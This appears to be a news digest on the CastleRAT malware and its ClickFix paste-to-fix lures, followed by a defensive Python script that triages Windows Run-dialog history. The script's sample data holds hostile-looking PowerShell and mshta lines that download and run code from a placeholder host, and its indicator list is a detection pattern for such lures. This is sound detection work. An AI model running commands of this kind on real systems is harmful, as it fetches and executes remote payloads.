Double trouble with CastleRAT malware, now in C and Python
"The ClickFix technique, first spotted last year, uses fake login screens from popular applications and web services, telling the user they have a problem and need to fix it. They instruct the operator to open the Windows Run dialog box or PowerShell terminal and cut and paste malware code into the system to "fix" the problem. And because the user installed the code themselves, it's more likely to get past security checks."
"The two variants of the malware, dubbed CastleRAT by security researchers at Recorded Future, are not equal, however. Both will establish a presence and download additional malware via a remote shell, and the Python build can self-delete if necessary. The C build is the most adept - capable of harvesting keystrokes, taking screen captures, and registering persistence. However, there is a method in this seeming disparity. The Python variant is far sneakier at slipping under the radar."
TAG-150 developed CastleRAT in both Python and C variants that propagate by tricking users into pasting malicious commands via ClickFix fake fixes and login prompts. Both variants create a foothold and download additional payloads through a remote shell, with the Python build able to self-delete. The C variant can harvest keystrokes, capture screens, and register persistence, while the Python variant currently exhibits few antivirus detections and appears designed for stealth. TAG-150 previously produced CastleBot and CastleLoader and distributes malware via bogus GitHub repositories and ClickFix social engineering. ClickFix convinces users to run pasted code in Run or PowerShell, increasing success against security checks.
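ClickFix lures work because the victim types the command into the Windows Run dialog or a PowerShell window themselves. Windows keeps a history of Run-dialog commands in the registry, which gives defenders a cheap triage point. The following is an added example (not code from the article, The Register, or Recorded Future): a small Python heuristic that parses RunMRU-style entries and flags the combinations typical of paste-to-fix lures. The sample entries, the `example.invalid` URLs and the indicator list are constructed for this example; the `SAMPLE_RUNMRU`, `triage` and `score_command` names are this example's own.

```python
"""Heuristic triage of Windows Run-dialog history for ClickFix-style pastes.

Windows stores commands entered in the Run dialog under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU as values
named a, b, c, ... whose data is the command followed by a literal "\\1";
the MRUList value lists the slot letters most-recent-first.
Everything below that is not that registry layout is constructed for
this example.
"""
import re

# Constructed sample of an exported RunMRU key (not real telemetry).
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "powershell -w hidden -ep bypass -c \"iex (iwr http://example.invalid/fix.ps1)\"\\1",
    "c": "mshta http://example.invalid/verify\\1",
}

# Indicators common to paste-to-fix lures: an interpreter or LOLBin launched
# from the Run dialog, a hidden window, policy bypass, an encoded command,
# download-then-execute, and a remote URL. Two or more together is suspicious.
INDICATORS = [
    (r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|bitsadmin|certutil)\b",
     "interpreter/LOLBin from Run dialog"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-e(?:xecutionpolicy|p)\s+bypass", "execution-policy bypass"),
    (r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b",
     "download-and-execute"),
    (r"https?://", "remote URL"),
]


def parse_runmru(values):
    """Return (slot, command) pairs most-recent-first, trailing '\\1' removed."""
    order = values.get("MRUList", "")
    entries = []
    for slot in order:
        raw = values.get(slot)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((slot, cmd))
    return entries


def score_command(cmd):
    """Return the labels of every indicator that matches the command."""
    return [label for pattern, label in INDICATORS
            if re.search(pattern, cmd, re.IGNORECASE)]


def triage(values, min_hits=2):
    """Flag Run-dialog entries that match at least min_hits indicators."""
    findings = []
    for slot, cmd in parse_runmru(values):
        hits = score_command(cmd)
        if len(hits) >= min_hits:
            findings.append({"slot": slot, "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_RUNMRU):
        print(f"[{finding['slot']}] {finding['command']}")
        print("    indicators:", ", ".join(finding["indicators"]))
```

On a Windows host the dictionary can be filled from the live key with the standard library (`winreg.OpenKey` on `HKEY_CURRENT_USER` and `winreg.EnumValue`), or from a `.reg` export collected during incident response. The threshold of two indicators keeps a plain `notepad` or `cmd` entry out of the findings while still catching the hidden-window, policy-bypass and download-and-run combinations that paste-to-fix lures rely on; tune the pattern list to the tooling your own users legitimately launch from Run.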
Read the full story at The Register.